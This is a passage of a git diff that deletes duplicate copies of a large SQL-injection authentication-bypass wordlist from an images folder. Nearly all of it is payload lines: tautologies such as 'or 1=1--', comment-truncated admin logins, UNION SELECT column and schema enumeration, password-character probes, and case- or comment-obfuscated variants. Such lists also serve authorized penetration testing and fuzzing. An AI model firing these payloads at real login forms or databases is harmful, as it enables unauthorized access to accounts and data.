-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
